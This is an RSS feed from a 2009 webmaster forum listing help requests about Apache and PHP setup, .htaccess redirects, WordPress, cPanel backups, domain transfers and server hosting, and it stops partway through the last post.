<?xml version="1.0" encoding="ISO-8859-1"?>

<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
	<channel>
		<title>Webmaster-Talk.com - Website and Server Administration Forum</title>
		<link>http://www.webmaster-talk.com/</link>
		<description>For discussions on .htaccess, Apache configuration, IIS, cPanel, Plesk, Direct Admin, ISS etc.</description>
		<language>en</language>
		<lastBuildDate>Sat, 21 Nov 2009 00:24:06 GMT</lastBuildDate>
		<generator>vBulletin</generator>
		<ttl>60</ttl>
		<image>
			<url>http://img.webmaster-talk.com/bluesky/vb_img/misc/rss.jpg</url>
			<title>Webmaster-Talk.com - Website and Server Administration Forum</title>
			<link>http://www.webmaster-talk.com/</link>
		</image>
		<item>
			<title>Installation problem Apache 2.2.14 win32 and php-5.3.1-Win32-VC6-x86</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/192084-installation-problem-apache-2-2-14-a.html</link>
			<pubDate>Fri, 20 Nov 2009 22:01:05 GMT</pubDate>
			<description><![CDATA[Hi, 
  
who can help me. 
I've installed Apache 2.2.14 on my Windows 2003 server. 
Now I try to install php-5.3.1-Win32-VC6-x86 and recieve an error...]]></description>
			<content:encoded><![CDATA[<div>Hi,<br />
 <br />
who can help me.<br />
I've installed Apache 2.2.14 on my Windows 2003 server.<br />
Now I try to install php-5.3.1-Win32-VC6-x86 and recieve an error that the batch can't install and I've to configure manualy.<br />
 <br />
When I insert the following maunaly:<br />
 <br />
#BEGIN PHP INSTALLER EDITS - REMOVE ONLY ON UNINSTALL<br />
ScriptAlias /php/ &quot;C:/PHP/&quot;<br />
Action application/x-httpd-php &quot;C:/PHP/php-cgi.exe&quot;<br />
#PHPIniDir &quot;C:/PHP/&quot;<br />
#LoadModule php5_module &quot;C:/PHP/php5apache2_2.dll&quot;<br />
#PHPIniDir &quot;C:/PHP/&quot;<br />
#LoadModule php5_module &quot;C:/PHP/php5apache2.dll&quot;<br />
#PHPIniDir &quot;C:/PHP/&quot;<br />
#LoadModule php5_module &quot;C:/PHP/php5apache.dll&quot;<br />
#END PHP INSTALLER EDITS - REMOVE ONLY ON UNINSTALL<br />
 <br />
AddType application/x-httpd-php .php<br />
AddType application/x-httpd-php-source .phps<br />
 <br />
When I remove the remark from the php5apache2_2.dll and PHPIniDir Apache isn't starting again but returns with an error. &quot;The requested operation has failed!&quot;<br />
The event viewer displays:<br />
 <br />
&quot;Faulting application httpd.exe, version 2.2.14.0, faulting module php5ts.dll, version 5.3.1.0, fault address 0x000e618c.&quot;<br />
 <br />
Who know what I can do to fix this?<br />
 <br />
Robert</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>giro</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/192084-installation-problem-apache-2-2-14-a.html</guid>
		</item>
		<item>
			<title>Apache (Mod ReWrite issue) for SEO url (help!)</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/192037-apache-mod-rewrite-issue-seo-url.html</link>
			<pubDate>Fri, 20 Nov 2009 06:37:42 GMT</pubDate>
			<description>Hi 
I believe this is in the correct forum. If not, please move. 
So I have edited my HTaccess file to look like the following: 
 
 
Code: 
---------...</description>
			<content:encoded><![CDATA[<div>Hi<br />
I believe this is in the correct forum. If not, please move.<br />
So I have edited my HTaccess file to look like the following:<br />
<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">Code:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left">Options +FollowSymlinks All -Indexes<br />
RewriteEngine On<br />
RewriteBase /<br />
<br />
RewriteCond %{HTTP_HOST} !^(www.|$) [NC]<br />
RewriteRule ^ http://www.%{HTTP_HOST}%{REQUEST_URI} [L,R=301]<br />
<br />
<br />
RewriteRule ^jdm-parts-detail-([0-9]+)-(.*)\.html$ product-details.php?ID=$1 [L]<br />
<br />
RewriteRule ^jdm-parts-listing-([A-Za-z]+)-([A-Za-z]+)-(.*)\.html$ parts-listing.php?SearchMakeID=$1&amp;SearchModelID=$2&amp;SearchYear=$3 [L]<br />
<br />
RewriteRule ^jdm-parts-package-([A-Za-z]+)-([A-Za-z]+)-(.*)\.html$ package-details.php?SearchMakeID=$1&amp;SearchModelID=$2&amp;SearchYear=$3 [L]<br />
<br />
RewriteRule ^jdm-parts-search-(.*)\.html$ parts-listing.php?PartsNo=$1 [L]</code><hr />
</div>This <b>SHOULD</b> be working. In other words, I should be able to type in the following:<br />
<a href="http://www.url.com/jdm-parts-listing-5-21-1991.html" target="_blank">http://www.url.com/jdm-parts-listing-5-21-1991.html</a><br />
and it should work.<br />
It keeps producing a 404 error though. What am I missing or doing wrong?<br />
<br />
The first part is simply to forward anyone going to <a href="http://url.com" target="_blank">http://url.com</a> to <a href="http://www.url.com" target="_blank">www.url.com</a><br />
<br />
So I need the following:<br />
<a href="http://bit.ly/3hxiM3" target="_blank">http://bit.ly/3hxiM3</a>   (click link)<br />
<br />
to turn into this:<br />
<a href="http://bit.ly/Wyx5t" target="_blank">http://bit.ly/Wyx5t</a>  (click link)<br />
<br />
Any thoughts?</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>e2tango</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/192037-apache-mod-rewrite-issue-seo-url.html</guid>
		</item>
		<item>
			<title>I crashed my own site</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/191986-i-crashed-my-own-site.html</link>
			<pubDate>Thu, 19 Nov 2009 13:10:50 GMT</pubDate>
			<description>I use wordpress via fantastico in hostgator, and I did something last night to crash one of my sites. I was having trouble with it so I went into...</description>
			<content:encoded><![CDATA[<div>I use wordpress via fantastico in hostgator, and I did something last night to crash one of my sites. I was having trouble with it so I went into Fantastico and clicked on &quot;remove&quot; and of course got the warning message that said &quot;this can't be undone!&quot; so I X'd out and decided not to remove anything until I knew what was going on. Now I get crazy messages when I visit my site, and when I am in wordpress and click on anything such as &quot;settings&quot; &quot;appearance&quot;, etc - I get &quot;internal server error&quot; and &quot;404 not found&quot; messages. <br />
<br />
I guess my question is, can I go back into Fantastico and go ahead and delete this site, and then re-download it? I realize I will have to start the site from scratch which is no big deal - I just want to make sure I in fact CAN re-download the site if I do go ahead and delete it. Any info at all is much appreciated. Thanks!!!!!!!!!!!!!!</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>BlondeHazel</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/191986-i-crashed-my-own-site.html</guid>
		</item>
		<item>
			<title>Have been hacked . does someone knows help?</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/191828-have-been-hacked-does-someone-knows.html</link>
			<pubDate>Tue, 17 Nov 2009 07:06:11 GMT</pubDate>
			<description><![CDATA[Hello, 
 
our website has been hacked, nothing extremly bad but rather annoying 
 
I found the following code in my source code 
<script src=removed...]]></description>
			<content:encoded><![CDATA[<div>Hello,<br />
<br />
our website has been hacked, nothing extremly bad but rather annoying<br />
<br />
I found the following code in my source code<br />
&lt;script src=removed &gt;&lt;/script&gt;<br />
<br />
Does anybody know how to remove this hack .<br />
<br />
Happy for any advice<br />
<br />
Thanks<br />
<br />
Ute</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>utehit</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/191828-have-been-hacked-does-someone-knows.html</guid>
		</item>
		<item>
			<title>Pass current directory through htaccess ErrorDocument</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/191827-pass-current-directory-through-htaccess-errordocument.html</link>
			<pubDate>Tue, 17 Nov 2009 07:01:36 GMT</pubDate>
			<description><![CDATA[EDIT: I decided on using a different solution, my idea wouldn't have worked as far as I can tell. 
 
Well. Each user has their own folder on my...]]></description>
			<content:encoded><![CDATA[<div>EDIT: I decided on using a different solution, my idea wouldn't have worked as far as I can tell.<br />
<br />
Well. Each user has their own folder on my server, and each folder contains an index.php. It's the only web file there, then there are images and thumbnails. I was hoping that I could easily use the htaccess file to redirect for me.<br />
<br />
So instead of having it like<br />
<br />
<a href="http://radgh.com/gallery/RadGH" target="_blank">http://radgh.com/gallery/RadGH</a><br />
<br />
I could use<br />
<br />
<a href="http://radgh.com/gallery?User=RadGH" target="_blank">http://radgh.com/gallery?User=RadGH</a><br />
<br />
Then the folders would only contain images and thumbnails. I thought that was the easiest way, but have been searching... and it looks like I was wrong. :(<br />
<br />
I have been working on it though, I got the gallery/index.php to work with $_GET. Now I can either replace every user's index.php with a redirect, or... well, thats the only possibility. I'll just make a script to recurse into each folder and change the index.php. Permissions are already set anyway.<br />
<br />
...Actually, thinking about it, I wouldn't get an error page if they have an index.php. I just don't know enough about the .htaccess I guess. Other than I can protect a folder and set up a custom 404 page</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>RadGH</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/191827-pass-current-directory-through-htaccess-errordocument.html</guid>
		</item>
		<item>
			<title>Webhost closed site.. need help...</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/191806-webhost-closed-site-need-help.html</link>
			<pubDate>Mon, 16 Nov 2009 21:55:03 GMT</pubDate>
			<description><![CDATA[OK, long story I'll try to keep short...  5 months before my last renewal my web host called up and said I had a mandatory server upgrade that was...]]></description>
			<content:encoded><![CDATA[<div>OK, long story I'll try to keep short...  5 months before my last renewal my web host called up and said I had a mandatory server upgrade that was going to require a 3 year committment.  I went along.  Well, it's 6 months before renewal time again and suddenly &quot;your account has been hacked by a pornographer out of Turkey and we had to suspend it&quot; requiring another 3 year commitment to a new server, with no possibility of giving me server space just for the remainder of the duration of my existing contract.<br />
<br />
Ain't gonna happen.  The host's company name is GISOL.COM and googling them it appears this is pretty standard procedure with them.<br />
<br />
At this point I have no ability to access my 9 year old website (wanna-dive-kona.com).  I have put the site up at another very similarly named URL (just removed 2 hyphens).  I don't believe there's any way to do a 301 redirect because I can't access the original site to get the code onto it.<br />
<br />
I've got good placement on search terms I want, but everything goes to that old &quot;suspended&quot; site.  Is there any way to keep my google ranking and get them to make the switch to the new domain, or at least get rid of all references to the old domain?  I'd be happy with just turning off the old domain and then rebuilding my ranking and placement - in this day and age that &quot;account suspended&quot; page looks like an out of business page when it's not.<br />
<br />
Any ideas?<br />
<br />
  Thanks,<br />
<br />
    Steve</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>wannadivesteve</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/191806-webhost-closed-site-need-help.html</guid>
		</item>
		<item>
			<title>tomcat hosting problem</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/191775-tomcat-hosting-problem.html</link>
			<pubDate>Mon, 16 Nov 2009 12:49:25 GMT</pubDate>
			<description>Hi all, 
 
My name is Nikolai and i have the problem listed bellow: 
 
i bought domain name www.mydomain.com (http://www.mydomain.com) and i...</description>
			<content:encoded><![CDATA[<div>Hi all,<br />
<br />
My name is Nikolai and i have the problem listed bellow:<br />
<br />
i bought domain name <a href="http://www.mydomain.com" target="_blank">www.mydomain.com</a> and i installed tomcat 6 on a server with windows 2003.<br />
<br />
I mapped the IP address of the server to the DNS <a href="http://www.mydomain.com" target="_blank">www.mydomain.com</a><br />
<br />
i put my website in the tomcat webapps directory and if someone want to access it he should type<br />
<br />
<a href="http://www.mydomain.com:8080/myWebSite" target="_blank">www.mydomain.com:8080/myWebSite</a><br />
<br />
and it works like a charm.<br />
<br />
What i am asking is how can i configure the tomcat container to be able to point users to myWebSite when they type ONLY THE DNS NAME in the browser url field<br />
<br />
 <a href="http://www.mydomain.com" target="_blank">www.mydomain.com</a>   to lead to <a href="http://www.mydomain.com:8080/myWebSite" target="_blank">www.mydomain.com:8080/myWebSite</a><br />
<br />
<br />
10x in advance.<br />
<br />
Nikolai.</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>N1CKYYY</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/191775-tomcat-hosting-problem.html</guid>
		</item>
		<item>
			<title>i need to transfer my domain and blog, sold it</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/191670-i-need-transfer-my-domain-blog.html</link>
			<pubDate>Sat, 14 Nov 2009 15:46:41 GMT</pubDate>
			<description>I just sold my website for $125 on digitalpoint. I need to transfer my domain to this buyer, as well as my Wordpress Blog.  
 
I think I need to get...</description>
			<content:encoded><![CDATA[<div>I just sold my website for $125 on digitalpoint. I need to transfer my domain to this buyer, as well as my Wordpress Blog. <br />
<br />
I think I need to get an EEP code or something from my domain register? and send that to the buyer? Then they can do the transfer.<br />
<br />
As for the website, do I just download my Wordpress files, zip it, and send it? what about the database info?</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>boxiom</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/191670-i-need-transfer-my-domain-blog.html</guid>
		</item>
		<item>
			<title><![CDATA[Move vB to a different folder on the same domain & server]]></title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/191557-move-vb-different-folder-same-domain.html</link>
			<pubDate>Fri, 13 Nov 2009 01:12:58 GMT</pubDate>
			<description>I Googled this but just keep coming up with moving vB to another server. I just need to move it from a subdomain to the main domain. Anyone have a...</description>
			<content:encoded><![CDATA[<div>I Googled this but just keep coming up with moving vB to another server. I just need to move it from a subdomain to the main domain. Anyone have a link handy or can give me easy to follow instructions?<br />
<br />
I've moved WordPress successfully. I figured this might be similar? :confused:</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>TripleMoons</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/191557-move-vb-different-folder-same-domain.html</guid>
		</item>
		<item>
			<title>.htaccess and WordPress</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/191534-htaccess-and-wordpress.html</link>
			<pubDate>Thu, 12 Nov 2009 16:35:26 GMT</pubDate>
			<description>I am trying to get the www version of my domain to be used, and only the www. 
 
The site is http://www.john-irving.net/ 
 
Here is the code I...</description>
			<content:encoded><![CDATA[<div>I am trying to get the www version of my domain to be used, and only the www.<br />
<br />
The site is <a href="http://www.john-irving.net/" target="_blank">http://www.john-irving.net/</a><br />
<br />
Here is the code I usually use in my .htaccess on my static sites to force the WWW version...<br />
<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">Code:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left">Options +FollowSymLinks<br />
RewriteEngine On<br />
RewriteBase /<br />
RewriteCond %{REQUEST_URI} !^/robots\.txt$<br />
RewriteCond %{HTTP_HOST} !^www\.domain\.com [NC]<br />
RewriteRule ^(.*)$ http://www.domain.com/$1 [R=301,L]</code><hr />
</div>This next bit is what is currently in my .htacces file for my blog. (The commented lines are what wordpress created.)<br />
<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">Code:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left">Options +FollowSymLinks<br />
RewriteEngine On<br />
RewriteBase /<br />
RewriteCond %{REQUEST_URI} !^/robots\.txt$<br />
RewriteCond %{HTTP_HOST} !^www\.john-irving\.net [NC]<br />
RewriteRule ^(.*)$ http://www.john-irving.net/$1 [R=301,L] <br />
<br />
<br />
<br />
# RewriteEngine On<br />
# RewriteBase /<br />
# RewriteCond %{REQUEST_FILENAME} !-f<br />
# RewriteCond %{REQUEST_FILENAME} !-d<br />
# RewriteRule . /index.php [L]</code><hr />
</div>If you visit my site you will see that it is somehow in an infinite loop moving from the www to non www versions.<br />
<br />
Is there a problem with my .htaccess or is this an issue with hosting setup? How do you think I could fix this? Thanks, John</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>johniman7</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/191534-htaccess-and-wordpress.html</guid>
		</item>
		<item>
			<title>SubDomain Problem (Please Urgent help)</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/191185-subdomain-problem-please-urgent-help.html</link>
			<pubDate>Sun, 08 Nov 2009 14:46:30 GMT</pubDate>
			<description>hi, 
i have a problem i am using Cpanel web Hosting 
 
When i Create Sub Domain and Upload Data to the Root website not open mean index.html page not...</description>
			<content:encoded><![CDATA[<div>hi,<br />
i have a problem i am using Cpanel web Hosting<br />
<br />
When i Create Sub Domain and Upload Data to the Root website not open mean index.html page not open<br />
<br />
For Example<br />
When i open<br />
<br />
<a href="http://webmaster.firstpk.com" target="_blank">http://webmaster.firstpk.com</a> (its not working)<br />
<br />
But<br />
<br />
When i Type<br />
<a href="http://webmaster.firstpk.com/index.html" target="_blank">http://webmaster.firstpk.com/index.html</a> (Its working fine)<br />
<br />
What is the Problem ? How i solve this ?<br />
<br />
I am using simple CSS/HTML Webpages not any script etc<br />
<br />
Please Help me</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>dukhi</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/191185-subdomain-problem-please-urgent-help.html</guid>
		</item>
		<item>
			<title>exclude folders from being re-written using .htaccess</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/191175-exclude-folders-being-re-written-using.html</link>
			<pubDate>Sun, 08 Nov 2009 11:50:10 GMT</pubDate>
			<description><![CDATA[I've a problem with this .htaccess file  
http://pastebin.com/m3c9a4e14 
 
I still can't access http://www.domain.com/admin/ it redirect to index.php...]]></description>
			<content:encoded><![CDATA[<div>I've a problem with this .htaccess file <br />
<a href="http://pastebin.com/m3c9a4e14" target="_blank">http://pastebin.com/m3c9a4e14</a><br />
<br />
I still can't access <a href="http://www.domain.com/admin/" target="_blank">http://www.domain.com/admin/</a> it redirect to index.php !<br />
<br />
**EDITED**<br />
The /admin/ folder has a .htaccess file too, and here's the content :<br />
RewriteEngine Off<br />
AuthType Basic<br />
AuthName &quot;Administrator Control Panel&quot;<br />
AuthUserFile &quot;./passwd&quot;<br />
require valid-user<br />
<br />
<br />
<br />
If I removed the .htaccess file in /admin/, it works fine.<br />
<br />
So, I think there's a conflict between 1st .htaccess file (on root) and 2nd one ( on /admin/ )</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>m_abdelfattah</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/191175-exclude-folders-being-re-written-using.html</guid>
		</item>
		<item>
			<title>What software to use to make a message board like this one?</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/191160-what-software-use-make-message-board.html</link>
			<pubDate>Sun, 08 Nov 2009 04:38:34 GMT</pubDate>
			<description><![CDATA[Hi, I'm wondering what software is being used to make a message board like this: http://makeupalley.com/board/board.asp?bid=1 
 
I looked at forum...]]></description>
			<content:encoded><![CDATA[<div>Hi, I'm wondering what software is being used to make a message board like this: <a href="http://makeupalley.com/board/board.asp?bid=1" target="_blank">http://makeupalley.com/board/board.asp?bid=1</a><br />
<br />
I looked at forum software, but I couldn't find any that shows all conversation threads on the same page.<br />
<br />
Suggestions would be greatly appreciated.<br />
<br />
Thank you.</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>lilblogger</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/191160-what-software-use-make-message-board.html</guid>
		</item>
		<item>
			<title>Creating MASTA site, need advice on hardware.</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/191148-creating-masta-site-need-advice-hardware.html</link>
			<pubDate>Sat, 07 Nov 2009 20:55:17 GMT</pubDate>
			<description><![CDATA[Hello, I'm new here but just like in the old days and in RPGS I needed a guild so I chose you guys...mmmm....  
 
ANYWAY. My site right now is in...]]></description>
			<content:encoded><![CDATA[<div>Hello, I'm new here but just like in the old days and in RPGS I needed a guild so I chose you guys...mmmm.... <br />
<br />
ANYWAY. My site right now is in production, it is about halfway done- in my head. I need an opinion. My site, details unnecessary, right now Ill stay techyyyyy ----<br />
<br />
<br />
----&gt; 20k users online at a time<br />
----&gt; 50k users with an account<br />
----&gt; Users only have title and avatar, few comment lines, personal info etc <br />
----&gt; Say, mmmm, 96 kbit/s LIVE audio stream <br />
----&gt; 100 <b>audio</b> streams on at a time<br />
----&gt; About 100 people listing to each stream<br />
----&gt; Remaining 10k people on live text chat, say 2 people together so 5k live text chats<br />
----&gt; 100 MB of audio archived a day<br />
<br />
Note: In my head this is <b>not</b> a social site, nor does it have anything to do wiff music, it is supa cool.....in my head. <br />
<br />
My questions:<br />
<br />
What type of bandwidth would is needed to serve out these streams AND host the website AND provide downloads for archived files?<br />
<br />
What type of hardware is needed? In my mind this site is pretty hardware dependent but i could be wrong.<br />
<br />
Am I right that just 1 TB disk space will last me a couple years for archiving.<br />
<br />
Any ideas, thoughts, speculations, comtemplations, evalutaions, no im not dr suess, on this would be greatly appreciated. <br />
<br />
Thankssssss.</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>Purelog1c</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/191148-creating-masta-site-need-advice-hardware.html</guid>
		</item>
		<item>
			<title>Please help pointing my godaddy to addon domain made in cpanel..</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/190983-please-help-pointing-my-godaddy-addon.html</link>
			<pubDate>Thu, 05 Nov 2009 18:21:21 GMT</pubDate>
			<description>I signed for a silver package web hosting from a different web hosting company which allows me to host multiple domain names. My question is, how can...</description>
			<content:encoded><![CDATA[<div>I signed for a silver package web hosting from a different web hosting company which allows me to host multiple domain names. My question is, how can i point my godaddy domain name to an addon domain that i made  through cpanel in other web hosting company.<br />
<br />
<br />
<a href="http://www.ciospace.com" target="_blank">http://www.ciospace.com</a>  -------------------&gt; public_html/ciospace.com<br />
godaddy                                                       other web hosting company<br />
<br />
I have already put the nameservers on godaddy but still not pointing.<br />
<br />
<font color="#000000"><font face="Helvetica"><b>Nameserver 1: <a href="http://ns109.webhostingworld.net/" target="_blank">ns109.webhostingworld.net</a> (75.125.203.178)<br />
Nameserver 2: <a href="http://ns110.webhostingworld.net/" target="_blank">ns110.webhostingworld.net</a> (75.125.203.179)<br />
<br />
<br />
</b></font></font></div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>johndavedecano</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/190983-please-help-pointing-my-godaddy-addon.html</guid>
		</item>
		<item>
			<title>Retrieve files by FTP??  plz help</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/190976-retrieve-files-by-ftp-plz-help.html</link>
			<pubDate>Thu, 05 Nov 2009 17:08:14 GMT</pubDate>
			<description><![CDATA[Hi, 
   I have shell access/whm/full root access to my current server. My old server only has FTP read only access as it is in recovery mode. I can't...]]></description>
			<content:encoded><![CDATA[<div>Hi,<br />
   I have shell access/whm/full root access to my current server. My old server only has FTP read only access as it is in recovery mode. I can't change this.<br />
<br />
I can't use SFTP of SCP commands as they are disabled on first server. <br />
<br />
I cant manually download then reupload to new server as its 90gb of files.<br />
<br />
What I want to do is download all the files from the old server to the new server via FTP, however their are a lot of files so I don't want to have to manually select each file name and paste it in. <br />
<br />
I need the equivalent to <br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">Code:</div>
	<hr /><code style="margin:0px" dir="ltr" style="text-align:left"> wget ftp://user:pass@91.91.91.91/backup/*.*</code><hr />
</div>basically I need my new server to connect via FTP, retrieve directory contents, then download everything in that directory. <br />
<br />
Please help me do this, i am completely stuck.</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>dimensio</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/190976-retrieve-files-by-ftp-plz-help.html</guid>
		</item>
		<item>
			<title>Backup / Restore with cPanel</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/190665-backup-restore-with-cpanel.html</link>
			<pubDate>Mon, 02 Nov 2009 15:26:11 GMT</pubDate>
			<description>I have backed up my websites using cPanel and need to restore them onto my new hosting account (a different company). 
 
Does anybody know if all of...</description>
			<content:encoded><![CDATA[<div>I have backed up my websites using cPanel and need to restore them onto my new hosting account (a different company).<br />
<br />
Does anybody know if all of my emails will have been backed up too? Also, should I leave restoring everything until I've transferred my domain over to my new account? As I can't really understand how my email addresses can be restored if the domain hasn't been transferred over?</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>pealo86</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/190665-backup-restore-with-cpanel.html</guid>
		</item>
		<item>
			<title>2 sites showing</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/190584-2-sites-showing.html</link>
			<pubDate>Sun, 01 Nov 2009 14:19:36 GMT</pubDate>
			<description>I recently updated my website and now I notice that www.mysitehere.ie (http://www.mysitehere.ie/) and mysitehere.ie are showing  different sites 
  
...</description>
			<content:encoded><![CDATA[<div>I recently updated my website and now I notice that <a href="http://www.mysitehere.ie/" target="_blank">www.mysitehere.ie</a> and mysitehere.ie are showing  different sites<br />
 <br />
 <br />
mysitehere.ie = old site<br />
 <br />
 <a href="http://www.mysitehere.ie/" target="_blank">www.mysitehere.ie</a> = new site<br />
 <br />
 <br />
 <b>Note</b> mysitehere, is sample name dont want to post real site</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>dbnavan</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/190584-2-sites-showing.html</guid>
		</item>
		<item>
			<title>http://www.site1.com + http://www.site2.com = same public_html folder?</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/190448-http-www-site1-com-http-www.html</link>
			<pubDate>Fri, 30 Oct 2009 17:38:54 GMT</pubDate>
			<description><![CDATA[What's the best way to point two URLs to the same folder? If .htaccess, what's the best script? 
 
Existing site is http://www.site1.com 
New site is...]]></description>
			<content:encoded><![CDATA[<div>What's the best way to point two URLs to the same folder? If .htaccess, what's the best script?<br />
<br />
Existing site is <a href="http://www.site1.com" target="_blank">http://www.site1.com</a><br />
New site is <a href="http://www.site2.com" target="_blank">http://www.site2.com</a><br />
The folder where index.html resides is public_html<br />
<br />
When a user browses to site2, I want it to stay as site2 - not &quot;resolve&quot; to site1. <br />
<br />
Make sense? Thanks in advance! :D</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>monstermovie</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/190448-http-www-site1-com-http-www.html</guid>
		</item>
		<item>
			<title>Iphone / SMS Server Monitoring Service Recommendations</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/190272-iphone-sms-server-monitoring-service-recommendations.html</link>
			<pubDate>Wed, 28 Oct 2009 15:42:15 GMT</pubDate>
			<description>I am running a web server (using Ubuntu + Apache2 + Mysql) which is being used to server ads via openx. 
 
What I am looking for is some sort of...</description>
			<content:encoded><![CDATA[<div>I am running a web server (using Ubuntu + Apache2 + Mysql) which is being used to server ads via openx.<br />
<br />
What I am looking for is some sort of service (either installed or 3rd party) that will allow me to access all the server's vitals and processes vitals using some sort of mobile application preferably for the Iphone.<br />
<br />
The few that I have researched are:<br />
<br />
Pingdom<br />
Server Monitor for iPhone<br />
Bjango<br />
<br />
Just wondering if anyone has used any of these, or have an alternative solution<br />
<br />
Cheers</div>

]]></content:encoded>
			<category domain="http://www.webmaster-talk.com/website-and-server-administration-forum/">Website and Server Administration Forum</category>
			<dc:creator>spyderwebtech</dc:creator>
			<guid isPermaLink="true">http://www.webmaster-talk.com/website-and-server-administration-forum/190272-iphone-sms-server-monitoring-service-recommendations.html</guid>
		</item>
		<item>
			<title>forum upload issues #2</title>
			<link>http://www.webmaster-talk.com/website-and-server-administration-forum/190035-forum-upload-issues-2-a.html</link>
			<pubDate>Sun, 25 Oct 2009 20:35:06 GMT</pubDate>
			<description>Sorry I am posting this again, but my other thread was locked. When I try to upload the forum to the 1and1 server it says this: 
 
Details: 
200 Type...</description>
			<content:encoded><![CDATA[<div>Sorry I am posting this again, but my other thread was locked. When I try to upload the forum to the 1and1 server it says this:<br />
<br />
